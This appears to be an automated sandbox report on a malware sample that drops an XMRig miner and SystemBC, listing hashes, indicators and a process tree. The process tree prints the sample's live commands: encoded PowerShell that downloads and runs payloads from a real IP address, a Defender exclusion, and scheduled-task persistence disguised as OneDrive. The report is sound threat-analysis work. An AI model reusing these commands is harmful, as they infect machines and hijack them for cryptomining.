Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
06/05/2023, 12:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
93KB
-
MD5
97a78d084446851cb1e74b4bb2045f3a
-
SHA1
efdf7e05c2d0b7993d6f4ce6642f2f536116ad36
-
SHA256
e0e267a1da22b796f4f8a7b84a81d0f0a461183cdc03d267a75e34d9fc497ccd
-
SHA512
d81e584282ba21f5b821e6c237ab5aeb987b009d689eb503f1f7019bb7698f5345a43b470390521928ebb16ca9ac8b6876387fd3987a501ab129e8661d93df2c
-
SSDEEP
1536:88bw0uWZGvOZnnlJ5t9UxrAwIVtdSDMvNcNIOOnQl+sb9m+dUs:bbhf5nj1wIvdSDMvNcNIObQso+d9
Malware Config
Extracted
http://62.204.41.23/o.png
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Extracted
systembc
185.161.248.16:4440
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 1624 created 1244 1624 OneDrive.exe 14 PID 1624 created 1244 1624 OneDrive.exe 14 PID 1624 created 1244 1624 OneDrive.exe 14 PID 572 created 1244 572 OneDrive.exe 14 PID 572 created 1244 572 OneDrive.exe 14 PID 572 created 1244 572 OneDrive.exe 14 PID 572 created 1244 572 OneDrive.exe 14 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/572-141-0x000000013F7F0000-0x00000001401BA000-memory.dmp xmrig behavioral1/memory/1316-166-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-172-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-178-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-182-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-186-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-190-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-194-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-198-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-202-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1316-206-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 784 powershell.exe 6 524 powershell.exe 7 1328 powershell.exe 10 1328 powershell.exe 13 1328 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Executes dropped EXE 5 IoCs
pid Process 1624 OneDrive.exe 636 dllhost.exe 572 OneDrive.exe 1180 lsass.exe 784 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Wine dllhost.exe -
Loads dropped DLL 3 IoCs
pid Process 1328 powershell.exe 1712 taskeng.exe 1180 lsass.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 636 dllhost.exe 1180 lsass.exe 784 lsass.exe 784 lsass.exe 784 lsass.exe 784 lsass.exe 784 lsass.exe 784 lsass.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 572 set thread context of 1620 572 OneDrive.exe 60 PID 572 set thread context of 1316 572 OneDrive.exe 61 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 928 schtasks.exe 1732 schtasks.exe 1104 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1716 timeout.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 524 powershell.exe 1212 powershell.exe 1328 powershell.exe 784 powershell.exe 1328 powershell.exe 1328 powershell.exe 1624 OneDrive.exe 1624 OneDrive.exe 1624 OneDrive.exe 1624 OneDrive.exe 1416 powershell.exe 1328 powershell.exe 1328 powershell.exe 1624 OneDrive.exe 1624 OneDrive.exe 636 dllhost.exe 1328 powershell.exe 1328 powershell.exe 572 OneDrive.exe 572 OneDrive.exe 572 OneDrive.exe 572 OneDrive.exe 608 powershell.exe 572 OneDrive.exe 572 OneDrive.exe 572 OneDrive.exe 572 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeShutdownPrivilege 1368 powercfg.exe Token: SeShutdownPrivilege 1732 powercfg.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeShutdownPrivilege 1716 powercfg.exe Token: SeShutdownPrivilege 544 powercfg.exe Token: SeShutdownPrivilege 752 powercfg.exe Token: SeShutdownPrivilege 1376 powercfg.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeShutdownPrivilege 1516 powercfg.exe Token: SeShutdownPrivilege 1536 powercfg.exe Token: SeLockMemoryPrivilege 1316 conhost.exe Token: SeLockMemoryPrivilege 1316 conhost.exe Token: SeDebugPrivilege 1180 lsass.exe Token: SeDebugPrivilege 784 lsass.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe -
Suspicious use of SendNotifyMessage 60 IoCs
pid Process 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe 1316 conhost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1180 lsass.exe 784 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1348 wrote to memory of 1212 1348 file.exe 27 PID 1348 wrote to memory of 1212 1348 file.exe 27 PID 1348 wrote to memory of 1212 1348 file.exe 27 PID 1348 wrote to memory of 784 1348 file.exe 29 PID 1348 wrote to memory of 784 1348 file.exe 29 PID 1348 wrote to memory of 784 1348 file.exe 29 PID 1348 wrote to memory of 1328 1348 file.exe 33 PID 1348 wrote to memory of 1328 1348 file.exe 33 PID 1348 wrote to memory of 1328 1348 file.exe 33 PID 1348 wrote to memory of 524 1348 file.exe 31 PID 1348 wrote to memory of 524 1348 file.exe 31 PID 1348 wrote to memory of 524 1348 file.exe 31 PID 1328 wrote to memory of 1624 1328 powershell.exe 35 PID 1328 wrote to memory of 1624 1328 powershell.exe 35 PID 1328 wrote to memory of 1624 1328 powershell.exe 35 PID 1104 wrote to memory of 1368 1104 cmd.exe 40 PID 1104 wrote to memory of 1368 1104 cmd.exe 40 PID 1104 wrote to memory of 1368 1104 cmd.exe 40 PID 1104 wrote to memory of 1732 1104 cmd.exe 41 PID 1104 wrote to memory of 1732 1104 cmd.exe 41 PID 1104 wrote to memory of 1732 1104 cmd.exe 41 PID 1104 wrote to memory of 1716 1104 cmd.exe 42 PID 1104 wrote to memory of 1716 1104 cmd.exe 42 PID 1104 wrote to memory of 1716 1104 cmd.exe 42 PID 1104 wrote to memory of 544 1104 cmd.exe 43 PID 1104 wrote to memory of 544 1104 cmd.exe 43 PID 1104 wrote to memory of 544 1104 cmd.exe 43 PID 1416 wrote to memory of 928 1416 powershell.exe 44 PID 1416 wrote to memory of 928 1416 powershell.exe 44 PID 1416 wrote to memory of 928 1416 powershell.exe 44 PID 1328 wrote to memory of 636 1328 powershell.exe 45 PID 1328 wrote to memory of 636 1328 powershell.exe 45 PID 1328 wrote to memory of 636 1328 powershell.exe 45 PID 1328 wrote to memory of 636 1328 powershell.exe 45 PID 1712 wrote to memory of 572 1712 taskeng.exe 49 PID 1712 wrote to memory of 572 1712 taskeng.exe 49 PID 1712 wrote to memory of 572 1712 taskeng.exe 49 PID 1328 wrote to memory of 1180 1328 powershell.exe 50 PID 1328 wrote to memory of 1180 1328 powershell.exe 50 PID 1328 wrote to memory of 1180 1328 powershell.exe 50 PID 1328 wrote to memory of 1180 1328 powershell.exe 50 PID 1760 wrote to memory of 752 1760 cmd.exe 55 PID 1760 wrote to memory of 752 1760 cmd.exe 55 PID 1760 wrote to memory of 752 1760 cmd.exe 55 PID 1760 wrote to memory of 1376 1760 cmd.exe 56 PID 1760 wrote to memory of 1376 1760 cmd.exe 56 PID 1760 wrote to memory of 1376 1760 cmd.exe 56 PID 1760 wrote to memory of 1516 1760 cmd.exe 57 PID 1760 wrote to memory of 1516 1760 cmd.exe 57 PID 1760 wrote to memory of 1516 1760 cmd.exe 57 PID 1760 wrote to memory of 1536 1760 cmd.exe 58 PID 1760 wrote to memory of 1536 1760 cmd.exe 58 PID 1760 wrote to memory of 1536 1760 cmd.exe 58 PID 608 wrote to memory of 1732 608 powershell.exe 59 PID 608 wrote to memory of 1732 608 powershell.exe 59 PID 608 wrote to memory of 1732 608 powershell.exe 59 PID 572 wrote to memory of 1620 572 OneDrive.exe 60 PID 572 wrote to memory of 1316 572 OneDrive.exe 61 PID 1180 wrote to memory of 1104 1180 lsass.exe 62 PID 1180 wrote to memory of 1104 1180 lsass.exe 62 PID 1180 wrote to memory of 1104 1180 lsass.exe 62 PID 1180 wrote to memory of 1104 1180 lsass.exe 62 PID 1180 wrote to memory of 784 1180 lsass.exe 64 PID 1180 wrote to memory of 784 1180 lsass.exe 64 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1244
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1624
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:636
-
-
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 14:31 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:1104
-
-
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:784
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE496.tmp.bat""5⤵PID:752
-
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:1716
-
-
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:928
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1732
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1620
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1316
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0A48622A-5667-4087-A42B-C478C83A7A89} S-1-5-21-1283023626-844874658-3193756055-1000:THEQWNRW\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:572
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
154B
MD55dfdd62dd713e9d2a39aa8bc066a7299
SHA1f7f2e041d2ee5eb1b91556bd287af269d57549fa
SHA256f13bb14edd93b4008da8c918eac1bb0fa456e0afce1c1b8773c65d997a64cc9f
SHA5128d5d001c3fae2b7957430cee6a9211a9e2d744682d8e702b3f28588b41a3829784f928417509baa6c6ff7e812d37d7a9597222f19983e4d7b87d620751245177
-
Filesize
154B
MD55dfdd62dd713e9d2a39aa8bc066a7299
SHA1f7f2e041d2ee5eb1b91556bd287af269d57549fa
SHA256f13bb14edd93b4008da8c918eac1bb0fa456e0afce1c1b8773c65d997a64cc9f
SHA5128d5d001c3fae2b7957430cee6a9211a9e2d744682d8e702b3f28588b41a3829784f928417509baa6c6ff7e812d37d7a9597222f19983e4d7b87d620751245177
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b28e8a3a72b5b129bfe9682c90c3477c
SHA18dd9ab2f66af7517220175b7a001375e8722b4c2
SHA256d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
SHA5125ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b28e8a3a72b5b129bfe9682c90c3477c
SHA18dd9ab2f66af7517220175b7a001375e8722b4c2
SHA256d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
SHA5125ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b28e8a3a72b5b129bfe9682c90c3477c
SHA18dd9ab2f66af7517220175b7a001375e8722b4c2
SHA256d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
SHA5125ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b28e8a3a72b5b129bfe9682c90c3477c
SHA18dd9ab2f66af7517220175b7a001375e8722b4c2
SHA256d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
SHA5125ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b28e8a3a72b5b129bfe9682c90c3477c
SHA18dd9ab2f66af7517220175b7a001375e8722b4c2
SHA256d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
SHA5125ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
